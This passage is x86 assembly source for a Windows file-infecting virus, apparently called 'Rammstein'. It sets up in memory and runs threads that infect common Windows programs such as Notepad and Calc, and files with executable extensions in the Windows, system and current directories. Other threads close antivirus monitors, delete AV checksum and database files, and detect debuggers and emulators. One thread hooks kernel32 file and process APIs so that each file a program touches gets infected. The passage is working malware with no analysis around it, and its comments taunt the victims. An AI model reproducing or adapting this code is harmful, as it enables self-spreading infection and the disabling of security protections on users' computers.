call fatalexit ;we cannot continue...
db "Not enough memory!", 0 ;
;
fatalexit: ;if an error occurs, then
push 0 ;simulate a fatal exit
call [ebp+_FatalAppExitA] ;
;
no_memory_error: ;
mov [ebp+memory], eax ;otherwise copy the
lea esi, [ebp+start] ;virus to memory and
mov edi, eax ;
mov ecx, virussize ;
rep movsb ;
add eax, offset resident_area - offset start;
push eax ;
ret ;continue there...
;
restore_epo: ;
IF EPO ;
mov edi, [ebp+addressofentrypoint] ;restore epo
add edi, [ebp+imagebase] ;
lea esi, [ebp+saved_code] ;
lodsd ;
stosd ;
lodsd ;
stosd ;
ENDIF ;
;
resident_area: ;
call getdelta2 ;get delta again...
;
getdelta2: ;
pop ebp ;
sub ebp, offset getdelta2 ;
mov [ebp+delta], ebp ;
IF ANTIEMU ;
mov [ebp+delta2], ebp ;
ENDIF ;
;
cmp [ebp+firstgen], 1 ;
je grunge ;
;
cmp [ebp+method], METHOD_MOVE_CODE ;check the method
jne second_method ;
;
mov esi, [ebp+codesource] ;if here, we must move
mov edi, [ebp+codedestin] ;some code back to where
add esi, [ebp+imagebase] ;it belongs...
add edi, [ebp+imagebase] ;
mov ecx, virussize ;
rep movsb ;
;
second_method: ;
;
grunge: ;
ENDIF ;
IF MAINTHREAD ;now we launch the main
lea ebx, [ebp+mainthreadid] ;thread
lea eax, [ebp+MainThread] ;
call [ebp+_CreateThread], 0, 0, eax, ebp, 0, ebx;
cmp [ebp+firstgen], 1 ;if it is the first gen
jne do_return ;than wait for it to
call [ebp+_WaitForSingleObject], eax, INFINITE ;finish
;
do_return: ;otherwise, return to host
jmp ReturnToHost ;here...
ENDIF ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MainThread proc ;
call @MainThreadDelta ;for our main thread get
@MainThreadDelta: ;the delta handle again
pop ebp ;
sub ebp, offset @MainThreadDelta ;
;
IF MAINTHREADSEH ;
lea eax, [ebp+MainExceptionExit] ; Setup a SEH frame
push eax ;
push dword ptr fs:[0] ;
mov fs:[0], esp ;
;
no_main_seh: ;
ENDIF ;
lea edx, [ebp+OurThreads] ;Prepare to create the
lea ebx, [ebp+OurThreadIds] ;threads...
lea edi, [ebp+OurThreadHandles] ;
mov ecx, 6 ;
;
create_loop: ;
mov eax, [edx] ;
add eax, ebp ;
call StartThread ;start them and set
add edx, 4 ;them
add ebx, 4 ;
add edi, 4 ;
loop create_loop ;
;
cmp [ebp+no_imports], TRUE ;
jne no_per_process_skip ;
mov [ebp+skipper], 1 ;
;
no_per_process_skip: ;
lea eax, [ebp+offset Semaphore] ;now prepare a semaphore
push eax ;to monitor their
push 31 ;execution
push 0 ;
push 0 ;
call [ebp+_CreateSemaphoreA] ;
mov [ebp+hsemaphore], eax ;
;
lea edi, [ebp+OurThreadHandles] ;and now start them...
mov ecx, 6 ;
;
resume_loop: ;
push ecx ;
push dword ptr [edi] ;
call [ebp+_ResumeThread] ;resume!
add edi, 4 ;
pop ecx ;
loop resume_loop ;
;
push FALSE ;Wait forever until all
push INFINITE ;threads finish...
push TRUE ;(if the mainthread is
lea eax, [ebp+offset OurThreadHandles] ;TRUE, by this time the
push eax ;host is already running
push 6 ;in parallel with this
call [ebp+_WaitForMultipleObjectsEx] ;thread)
;
lea eax, [ebp+test_semaphore] ;now get the last count
push eax ;of the semaphore...
push 1 ;Should be 6*5...
push [ebp+hsemaphore] ;
call [ebp+_ReleaseSemaphore] ;
;
push [ebp+hsemaphore] ;close semaphore
call [ebp+_CloseHandle] ;
;
mov eax, [ebp+test_semaphore] ;now get the value
mov ebx, offset where_to - offset jump ;calculate jump offset
sub ebx, 30 ;5*6
add eax, ebx ;and make a jump with it
add eax, offset jump ;If the value is smaller
add eax, ebp ;
jump: jmp eax ;then it should
jmp jump ;mean someone fucked with
jmp jump ;our threads and probably
jmp jump ;the execution falls here
jmp jump ;where it hangs... This
jmp jump ;will give the user the
jmp jump ;impression that he played
jmp jump ;with hot stuff...
;
where_to: ;
IF MAINTHREAD ;if we have a mainthread
db 0E9h ;we must kill it...
dd offset KillThread - $-4 ;
ELSE ;
db 0E9h ;otherwise, simply return
dd offset ReturnToHost - $-4 ;to host...
ENDIF ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
StartThread: ;
pusha ;here we create threads
call [ebp+_CreateThread], 0, 0, eax, ebp, CREATE_SUSPENDED, ebx
mov [edi], eax ;
push THREAD_PRIORITY_HIGHEST ;and set their priority
push dword ptr [ebx] ;
call [ebp+_SetThreadPriority] ;
popa ;
db 0c3h ;ret
ret ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
OurThreadIds: ;
Thread_1_id dd 0 ;Direct infector
Thread_2_id dd 0 ;Directory infector
Thread_3_id dd 0 ;AV killed
Thread_4_id dd 0 ;Anti-debugging
Thread_5_id dd 0 ;Api hooker
Thread_6_id dd 0 ;Network infector
;
OurThreadHandles: ;
Thread_1_handle dd 0 ;
Thread_2_handle dd 0 ;
Thread_3_handle dd 0 ;
Thread_4_handle dd 0 ;
Thread_5_handle dd 0 ;
Thread_6_handle dd 0 ;
hsemaphore dd 0 ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;Û This Thread is the direct infector thread
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Thread_1_StartAddress proc PASCAL tdelta: dword ;
call @Thread1Delta ;I have been experiencing
@Thread1Delta: ;problems with delta pass
pop ebp ;via the parameter so I
sub ebp, offset @Thread1Delta ;decided to read it again
;
IF THREAD1SEH ;
lea eax, [ebp+Thread1Exception] ; Setup a SEH frame
push eax ;
push dword ptr fs:[0] ;
mov fs:[0], esp ;
ENDIF ;
;
IF DIRECT ;
lea esi, [ebp+offset direct_list] ;point file names in the
mov ecx, direct_list_len ;Windows directory and
call not_list ;restore names...
;
push 260d ;
call windir ;get the Windows dir.
name_ db 260d dup (0) ;
;
windir: ;
call [ebp+_GetWindowsDirectoryA] ;
lea edi, [ebp+name_] ;point the dir path
xchg eax, edx ;
lea esi, [ebp+direct_list] ;point names
inc esi ;
inc esi ;
;
direct_loop: ;
mov word ptr [edi+edx], 005Ch ;mark terminator slash
cmp byte ptr [esi], 0FFh ;was last name?
je direct_end ;
call [ebp+_lstrcat], edi, esi ;concatenate stringz
lea eax, [ebp+W32FD] ;pointer to find data
call [ebp+_FindFirstFileA], edi, eax ;find file
cmp eax, INVALID_HANDLE_VALUE ;none?
je next_direct ;
;
push edi ;
lea edi, [edi.WFD_cFileName] ;
@001: cmp [ebp+free_routine], NOT_AVAILABLE ;
je @001 ;
mov [ebp+free_routine], NOT_AVAILABLE ;
call InfectFile ;Infect it!!
pop edi ;
mov [ebp+free_routine], AVAILABLE ;
;
next_direct: ;
@endsz ;go to end of string
jmp direct_loop ;and do it again...
ENDIF ;
;
direct_end: ;
lea esi, [ebp+offset direct_list] ;point names again and
mov ecx, direct_list_len ;restore encryption
call not_list ;
;
IF THREAD1SEH ;
jmp restore_thread1_seh ;host
;
Thread1Exception: ;if we had an error we
mov esp, [esp+8] ;must restore the ESP
call DeltaRecover1 ;
DeltaRecover1: ;
pop ebp ;
sub ebp, offset DeltaRecover1 ;
;
restore_thread1_seh: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;
ENDIF ;
;
push 0 ;
push 5 ;
push [ebp+hsemaphore] ;
call [ebp+_ReleaseSemaphore] ;release the semaphore
call [ebp+_ExitThread], 0 ;
Thread_1_StartAddress endp ;
;
direct_list: ;the direct action list
IF DEBUG ;if debug is on only
noter <L> ;
noter <DGoat*.*> ;goat files will be
ELSE ;infected...
noter <L> ;
noter <Cdplayer.exe> ; Like CD music?
noter <Notepad.exe> ; Like to write stuff?
noter <Wordpad.exe> ; Like to write better?<g>
noter <Calc.exe> ; Like to calculate?
noter <DrWatson.exe> ; Fear the errors?
noter <Extrac32.exe> ; Like to extract?
noter <Mplayer.exe> ; Like mpegs?
noter <MsHearts.exe> ; Like stupid games?
noter <WinMine.exe> ; And more stupid games?
noter <Sol.exe> ; And still more stupid?
noter <SndVol32.exe> ; Like to adjust yer vol?
noter <WinHlp32.exe> ; Are you using help?
ENDIF ; Well... TO BAD !!!! ;-)
direct_list_len = $ - offset direct_list ;
db 0FFh ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;Û This Thread is the directory infector thread
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Thread_2_StartAddress proc PASCAL tdelta: dword ;
call @Thread2Delta ;
@Thread2Delta: ;
pop ebp ;
sub ebp, offset @Thread2Delta ;
;
IF THREAD2SEH ;
lea eax, [ebp+Thread2Exception] ; Setup a SEH frame
push eax ;
push dword ptr fs:[0] ;
mov fs:[0], esp ;
ENDIF ;
;
push 0 ;Get the drive type. If
call [ebp+_GetDriveTypeA] ;it is a fixed drive
sub [ebp+crt_dir_flag], eax ;than this value = 0
;
push 260 ;Get Windows directory
call @1 ;
wdir db 260 dup(0) ;
@1: call [ebp+_GetWindowsDirectoryA] ;
;
push 260 ;Get System directory
call @2 ;
sysdir db 260 dup(0) ;
@2: call [ebp+_GetSystemDirectoryA] ;
;
call @3 ;Get current directory
crtdir db 260 dup(0) ;
@3: push 260 ;
call [ebp+_GetCurrentDirectoryA] ;
;
cmp dword ptr [ebp+crt_dir_flag], 0 ;are we on a fixed disk?
jne direct_to_windows ;
;
mov dword ptr [ebp+infections], 0FFFFh ;infect all files there
call Infect_Directory ;
;
direct_to_windows: ;
cmp [ebp+firstgen], 1 ;
je back_to_current_dir ;
;
lea eax, [ebp+offset wdir] ;Change to Windows dir.
push eax ;
call [ebp+_SetCurrentDirectoryA] ;
;
mov dword ptr [ebp+infections], 3 ;infect 3 files there
call Infect_Directory ;
;
lea eax, [ebp+offset sysdir] ;Change to System dir.
push eax ;
call [ebp+_SetCurrentDirectoryA] ;
;
mov dword ptr [ebp+infections], 3 ;infect 3 files there
call Infect_Directory ;
;
back_to_current_dir: ;
lea eax, [ebp+offset crtdir] ;Change back to crt dir.
push eax ;
call [ebp+_SetCurrentDirectoryA] ;
;
IF THREAD2SEH ;
jmp restore_thread2_seh ;host
;
Thread2Exception: ;if we had an error we
mov esp, [esp+8] ;must restore the ESP
call DeltaRecover2 ;
DeltaRecover2: ;
pop ebp ;
sub ebp, offset DeltaRecover2 ;
;
restore_thread2_seh: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;
ENDIF ;
;
push 0 ;
push 5 ;
push [ebp+hsemaphore] ;
call [ebp+_ReleaseSemaphore] ;
call [ebp+_ExitThread], 0 ;
infections dd 0 ;
crt_dir_flag dd 3 ;
;
Infect_Directory proc ;directory scanner
pusha ;
lea esi, [ebp+file_extensions] ;restore filenames
mov ecx, file_extensions_len ;
call not_list ;
inc esi ;
inc esi ;
;
find_first_file: ;
cmp byte ptr [esi], 0FFh ;last?
je done_directory ;
lea edi, [ebp+offset W32FD] ;find first!!
call [ebp+_FindFirstFileA], esi, edi ;
mov edx, eax ;
;
compare_result: ;
cmp eax, INVALID_HANDLE_VALUE ;
je next_extension ;
or eax, eax ;
je next_extension ;
push edi ;
lea edi, [edi.WFD_cFileName] ;point name...
@002: cmp [ebp+free_routine], NOT_AVAILABLE ;syncronize!!!
je @002 ;
mov [ebp+free_routine], NOT_AVAILABLE ;
call InfectFile ;infect it!
mov [ebp+free_routine], AVAILABLE ;
pop edi ;
jc find_next_file ;
dec [ebp+infections] ;
cmp [ebp+infections], 0 ;
jz done_directory ;
;
find_next_file: ;
push edx ;
call [ebp+_FindNextFileA], edx, edi ;find next
pop edx ;
jmp compare_result ;
;
next_extension: ;
@endsz ;
jmp find_first_file ;
;
done_directory: ;
lea esi, [ebp+file_extensions] ;recrypt the extenstions
mov ecx, file_extensions_len ;
call not_list ;
popa ;
ret ;
Infect_Directory endp ;
;
file_extensions: ;the list with valid
IF DEBUG ;
noter <L> ;
noter <GOAT*.EXE> ;extensions
noter <GOAT*.COM> ;
noter <GOAT*.ACM> ;
noter <GOAT*.CPL> ;
noter <GOAT*.HDI> ;
noter <GOAT*.OCX> ;
noter <GOAT*.PCI> ;
noter <GOAT*.QTC> ;
noter <GOAT*.SCR> ;
noter <GOAT*.X32> ;
noter <GOAT*.CNV> ;
noter <GOAT*.FMT> ;
noter <GOAT*.OCM> ;
noter <GOAT*.OLB> ;
noter <GOAT*.WPC> ;
ELSE ;extensions
noter <L> ;
noter <*.EXE> ;normal exe
noter <*.COM> ;same
noter <*.ACM> ;
noter <*.CPL> ;control panel object
noter <*.HDI> ;heidi file
noter <*.OCX> ;windowz ocx
noter <*.PCI> ;
noter <*.QTC> ;
noter <*.SCR> ;screen saver
noter <*.X32> ;
noter <*.CNV> ;
noter <*.FMT> ;
noter <*.OCM> ;
noter <*.OLB> ;
noter <*.WPC> ;
ENDIF ;
file_extensions_len = $-offset file_extensions ;
db 0FFh ;
Thread_2_StartAddress endp ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;Û This Thread is the AV monitors and checksums killer thread
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Thread_3_StartAddress proc PASCAL tdelta: dword ;
call @Thread3Delta ;
@Thread3Delta: ;
pop ebp ;
sub ebp, offset @Thread3Delta ;
;
IF THREAD3SEH ;
lea eax, [ebp+Thread3Exception] ; Setup a SEH frame
push eax ;
push dword ptr fs:[0] ;
mov fs:[0], esp ;
ENDIF ;
;
IF ANTIAV ;
lea esi, [ebp+av_monitors] ;First kill some monitors
mov ecx, monitors_nr ;
;
LocateMonitors: ;
push ecx ;
call [ebp+_FindWindowA], 0, esi ;
xchg eax, ecx ;
jecxz get_next_monitor ;
call [ebp+_PostMessageA], ecx, WM_ENDSESSION, 0, 0
;
get_next_monitor: ;
@endsz ;
pop ecx ;
loop LocateMonitors ;
;
lea esi, [ebp+offset av_list] ;point av files list
mov ecx, av_list_len ;and
call not_list ;restore names...
inc esi ;
inc esi ;
lea edi, [ebp+offset searchfiles] ;point to Search Record
;
locate_next_av: ;
mov eax, esi ;
cmp byte ptr [eax], 0FFh ;is this the end?
je av_kill_done ;
push edi ;push search rec. address
push eax ;push filename address
call [ebp+_FindFirstFileA] ;find first match
inc eax ;
jz next_av_file ;
dec eax ;
push eax ;
lea ebx, [edi.WFD_cFileName] ;ESI = ptr to filename
push 80h ;
push ebx ;
call [ebp+_SetFileAttributesA] ;
push ebx ;push filename address
call [ebp+_DeleteFileA] ;delete file!
;
call [ebp+_FindClose] ;close the find handle
;
next_av_file: ;
@endsz ;
jmp locate_next_av ;
;
av_kill_done: ;
lea esi, [ebp+offset av_list] ;point av files list
mov ecx, av_list_len ;
call not_list ;hide names...
ENDIF ;
;
IF THREAD3SEH ;
jmp restore_thread3_seh ;host
;
Thread3Exception: ;if we had an error we
mov esp, [esp+8] ;must restore the ESP
call DeltaRecover3 ;
DeltaRecover3: ;
pop ebp ;
sub ebp, offset DeltaRecover3 ;
;
restore_thread3_seh: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;
ENDIF ;
;
push 0 ;
push 5 ;
push [ebp+hsemaphore] ;
call [ebp+_ReleaseSemaphore] ;
call [ebp+_ExitThread], 0 ;
Thread_3_StartAddress endp ;
av_monitors label ;
db 'AVP Monitor', 0 ;
db 'Amon Antivirus Monitor', 0 ;
monitors_nr = 2 ;
;
searchfiles WIN32_FIND_DATA <?> ;
;
av_list label ;
noter <L> ;
noter <AVP.CRC> ;the av files to kill
noter <IVP.NTZ> ;
noter <Anti-Vir.DAT> ;
noter <CHKList.MS> ;
noter <CHKList.CPS> ;
noter <SmartCHK.MS> ;
noter <SmartCHK.CPS> ;
noter <AVG.AVI> ;
noter <NOD32.000> ;
noter <DRWEBASE.VDB> ;
noter <AGUARD.DAT> ;
noter <AVGQT.DAT> ;
noter <LGUARD.VPS> ;
av_list_len = $ - offset av_list ;
db 0FFh ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;Û This Thread is the anti-debugging and anti-emulation thread
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Thread_4_StartAddress proc PASCAL tdelta: dword ;
call @Thread4Delta ;
@Thread4Delta: ;
pop ebp ;
sub ebp, offset @Thread4Delta ;
;
IF THREAD4SEH ;
lea eax, [ebp+Thread4Exception] ; Setup a SEH frame
push eax ;
push dword ptr fs:[0] ;
mov fs:[0], esp ;
ENDIF ;
;
IF ANTIEMU ;
lea eax, [ebp+DebuggerKill] ;antidebugging stuffs.
push eax ;Here we set up a new
xor ebx, ebx ;seh frame and then we
push dword ptr fs:[ebx] ;make an exception error
mov fs:[ebx], esp ;occur.
dec dword ptr [ebx] ;TD stops here if in
;default mode.
jmp shut_down ;
;
DebuggerKill: ;
mov esp, [esp+8] ;the execution goes here
pop dword ptr fs:[0] ;
add esp, 4 ;
;
db 0BDh ;delta gets lost so we
delta2 dd 0 ;must restore it...
;
call @7 ;here we try to retrieve
db 'IsDebuggerPresent', 0 ;IsDebuggerPresent API
@7: push [ebp+k32] ;if we fail it means we
call [ebp+_GetProcAddress] ;don't have this api
or eax, eax ;(Windows95)
jz continue_antiemu ;
;
call eax ;Let's check if our
or eax, eax ;process is being
jne shut_down ;debugged.
;
mov ecx, fs:[20h] ; ECX = Context of debugger
jecxz softice ; If ECX<>0, we're debugged
jmp shut_down ;
;
softice: ;
lea edi, [ebp+SoftIce1] ;try to see if we are
call detect_softice ;being debugged by
jc shut_down ;softice
lea edi, [ebp+SoftIce1] ;
call detect_softice ;
jc shut_down ;
jmp nod_ice ;
;
detect_softice: ;
xor eax, eax ;
push eax ;
push 00000080h ;
push 00000003h ;
push eax ;
inc eax ;
push eax ;
push 80000000h or 40000000h ;
push edi ;
call [ebp+_CreateFileA] ;
;
inc eax ;
jz cantcreate ;
dec eax ;
;
push eax ;
call [ebp+_CloseHandle] ;
stc ;
db 0c3h ;
;
cantcreate: ;
clc ;
db 0c3h ;
;
nod_ice: ;
cmp byte ptr [ebp+version], 4 ;can we use debug regs?
jae cannot_kill_debug ;
;
lea esi, [ebp+drs] ;Debug Registers opcodes
mov ecx, 7 ;7 registers
lea edi, [ebp+bait] ;point the opcode place
;
repp: ;
lodsb ;take the opcode
mov byte ptr [edi], al ;generate instruction
call zapp ;call it!
loop repp ;do it again
jmp compute_now ;
;
zapp: ;
xor eax, eax ;eax = 0
dw 230fh ;to mov DRx, eax
bait label ;
db 0 ;
db 0C3h ;
;
drs db 0c0h, 0c8h, 0d0h, 0d8h, 0e8h, 0f0h, 0f8h ;debug registers opcodes
;
compute_now: ;
mov eax, dr0 ;
cmp eax, 0 ;
jne shut_down ;
;
cannot_kill_debug: ;
IF MMX ;
cmp [ebp+mmx], TRUE ;
jne no_mmx_here ;
mov ecx, 6666h ;do some loops
mov eax, 1111h ;very lite mmx_usage
; movd1 mm1, esi ;
; movd1 eax, mm1 ;
; cmp eax, esi ;
; jne shut_down ;
ENDIF ;
;
no_mmx_here: ;
mov ebx, esp ;or by nod ice and
push cs ;others...
pop eax ;
cmp esp, ebx ;
jne shut_down ;
jmp continue_antiemu ;
;
shut_down: ;
IF DEBUG ;
call [ebp+_MessageBoxA], 0, offset debug, offset debug, 0
ENDIF ;
push 0 ;If so, close down!!
call [ebp+_ExitProcess] ;close
IF DEBUG ;
debug db 'Shut down by anti-emulator', 0 ;
ENDIF ;
continue_antiemu: ;
ELSE ;
ENDIF ;
;
IF THREAD4SEH ;
jmp restore_thread4_seh ;host
;
Thread4Exception: ;if we had an error we
mov esp, [esp+8] ;must restore the ESP
call DeltaRecover4 ;
DeltaRecover4: ;
pop ebp ;
sub ebp, offset DeltaRecover4 ;
;
restore_thread4_seh: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;
ENDIF ;
;
push 0 ;
push 5 ;
push [ebp+hsemaphore] ;
call [ebp+_ReleaseSemaphore] ;
call [ebp+_ExitThread], 0 ;
;
SoftIce1 db "\\.\SICE",0 ;
SoftIce2 db "\\.\NTICE",0 ;
Thread_4_StartAddress endp ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;Û This Thread is the API hooker thread
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Thread_5_StartAddress proc PASCAL tdelta: dword ;
call @Thread5Delta ;
@Thread5Delta: ;
pop ebp ;
sub ebp, offset @Thread5Delta ;
;
IF THREAD5SEH ;
lea eax, [ebp+Thread5Exception] ; Setup a SEH frame
push eax ;
push dword ptr fs:[0] ;
mov fs:[0], esp ;
ENDIF ;
;
cmp [ebp+skipper], 1 ;
je error ;
;
IF APIHOOK ;
cmp [ebp+firstgen], 1 ;don't hook gen0
je error ;
mov ebx, dword ptr [ebp+ourimagebase] ; now put imagebase in ebx
mov esi, ebx ;
mov ax, word ptr [esi] ;
xor ax, 'GSRS' ;
cmp ax, 'ZM' xor 'GSRS' ; check if it is an EXE
jne error ;
mov esi, dword ptr [esi.MZ_lfanew] ; get pointer to PE
cmp esi, 1000h ; too far away?
jae error ;
add esi, ebx ;
mov ax, word ptr [esi] ;
xor ax, 'DC4û' ;
cmp ax, 'EP' xor 'DC4û' ; is it a PE?
jne error ;
add esi, IMAGE_FILE_HEADER_SIZE ; skip header
mov edi, dword ptr [esi.OH_DataDirectory.DE_Import.DD_VirtualAddress]
add edi, ebx ; and get import RVA
mov ecx, dword ptr [esi.OH_DataDirectory.DE_Import.DD_Size]
add ecx, edi ; and import size
mov eax, edi ; save RVA
;
locate_module: ;
mov edi, dword ptr [edi.ID_Name] ; get the name
add edi, ebx ;
push eax ;
mov eax, [edi] ;
xor eax, 'øSOHáý' ;
cmp eax, 'NREK' xor 'øSOHáý' ; and compare to KERN
pop eax ;
je found_the_import_module ; if it is not that one
add eax, IMAGE_IMPORT_DESCRIPTOR_SIZE ; skip to the next desc.
mov edi, eax ;
cmp edi, ecx ; but not beyond the size
jae error ; of the descriptor
jmp locate_module ;
;
found_the_import_module: ; if we found the kernel
mov edi, eax ; import descriptor
mov esi, dword ptr [edi.ID_FirstThunk] ; take the pointer to
add esi, ebx ; addresses
mov edi, dword ptr [edi.ID_Characteristics] ; and the pointer to
or edi, edi ; no names? ;-(
jz error ;
add edi, ebx ; names
mov edx, functions_nr ;
;
hooked_api_locate_loop: ;
push edi ; save pointer to names
mov edi, dword ptr [edi.TD_AddressOfData] ; go to the actual thunk
add edi, ebx ;
add edi, 2 ; and skip the hint
;
push edi esi ; save these
xchg edi, esi ;
call StringCRC32 ; eax = crc32
;
push edi ecx ;search them...
lea edi, [ebp+HookedFunctions] ;
mov ecx, functions_nr ;
;
check: ;
cmp [edi], eax ;does it match?
je found_it ;
add edi, 8 ;get next...
loop check ;
jmp not_found ;
;
found_it: ;
mov eax, [edi+4] ;get the new address
mov [ebp+tempcounter], edi ;
add eax, ebp ;and align to imagebase
pop ecx edi ;
jmp found_one_api ;
;
not_found: ;
pop ecx edi ;
;
pop esi edi ; otherwise restore
;
pop edi ; restore arrays indexes
;
api_next: ;
add edi, 4 ; and skip to next
add esi, 4 ;
cmp dword ptr [esi], 0 ; 0? -> end of import
je error ;
jmp hooked_api_locate_loop ;
;
found_one_api: ;
pop esi ; restore stack
pop edi ;
pop edi ;
;
pusha ;
mov edi, [ebp+tempcounter] ;
mov ebx, [esi] ;
lea eax, [ebp+offset HookedFunctions] ;
sub edi, eax ;
mov ecx, 8 ;
xchg eax, edi ;
xor edx, edx ;
div ecx ;
imul eax, eax, proc_len ;
lea edi, [ebp+StartOfHooks] ;
add edi, eax ;
mov byte ptr [edi+5], 0E9h ;
sub ebx, edi ;
add ebx, 05h-0fh ;
mov [edi+6], ebx ;
popa ;
;
mov [esi], eax ;save new api address!!!
dec edx ;did we find all?
jz error ;
jmp api_next ;
ENDIF ;
;
error: ;
mov [ebp+apihookfinish], 1 ;
IF THREAD5SEH ;
jmp restore_thread5_seh ;host
;
Thread5Exception: ;if we had an error we
mov esp, [esp+8] ;must restore the ESP
call DeltaRecover5 ;
DeltaRecover5: ;
pop ebp ;
sub ebp, offset DeltaRecover5 ;
;
restore_thread5_seh: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;
ENDIF ;
;
push 0 ;
push 5 ;
push [ebp+hsemaphore] ;
call [ebp+_ReleaseSemaphore] ;
call [ebp+_ExitThread], 0 ;
Thread_5_StartAddress endp ;
;
StartOfHooks label ;
Hook_CopyFileA: ;Here come the hook
call Hooker ;redirectors...
jmp [ebp+_CopyFileA] ;
Hook_CopyFileExA: ;
call Hooker ;
jmp [ebp+_CopyFileExA] ;
Hook_CreateFileA: ;
call CreateFileHooker ;
jmp [ebp+_CreateFileA] ;
Hook_GetCompressedFileSizeA: ;
call Hooker ;
jmp [ebp+_GetCompressedFileSizeA] ;
Hook_GetFileAttributesA: ;
call Hooker ;
jmp [ebp+_GetFileAttributesA] ;
Hook_GetFileAttributesExA: ;
call Hooker ;
jmp [ebp+_GetFileAttributesExA] ;
Hook_SetFileAttributesA: ;
call Hooker ;
jmp [ebp+_SetFileAttributesA] ;
Hook_GetFullPathNameA: ;
call Hooker ;
jmp [ebp+_GetFullPathNameA] ;
Hook_MoveFileA: ;
call Hooker ;
jmp [ebp+_MoveFileA] ;
Hook_MoveFileExA: ;
call Hooker ;
jmp [ebp+_MoveFileExA] ;
Hook_OpenFile: ;
call Hooker ;
jmp [ebp+_OpenFile] ;
Hook_CreateProcessA: ;
call Hooker ;
jmp [ebp+_CreateProcessA] ;
Hook_WinExec: ;
call Hooker ;
jmp [ebp+_WinExec] ;
Hook_DestroyWindow: ;
call ExitProcessHooker ;
jmp [ebp+_DestroyWindow] ;
Hook_ExitProcess: ;
call ExitProcessHooker ;
jmp [ebp+_ExitProcess] ;
proc_len = $-Hook_ExitProcess ;
;
Hooker proc ;And this is our hook...
pushad ;
pushfd ;
;
call @HookerDelta ;
@HookerDelta: ;
pop ebp ;
sub ebp, offset @HookerDelta ;
;
IF VIRUSNOTIFYHOOK ;
pusha ;
push 0 ;
call hooktext1 ;
db 'Rammstein viral hook code!', 0 ;
hooktext1: ;
call hooktext2 ;
db 'Rammstein viral hook code!', 0 ;
hooktext2: ;
push 0 ;
call [ebp+_MessageBoxA] ;
popa ;
ENDIF ;
;
good_to_infect: ;
mov esi, [esp+2ch] ;
push esi ;
call ValidateFile ;first validate the file
pop edi ;
jc no_good_file ;
;
@003: cmp [ebp+free_routine], NOT_AVAILABLE ;
je @003 ;
mov [ebp+free_routine], NOT_AVAILABLE ;
call InfectFile ;
mov [ebp+free_routine], AVAILABLE ;
;
no_good_file: ;
popfd ;
popa ;
ret ;
Hooker endp ;
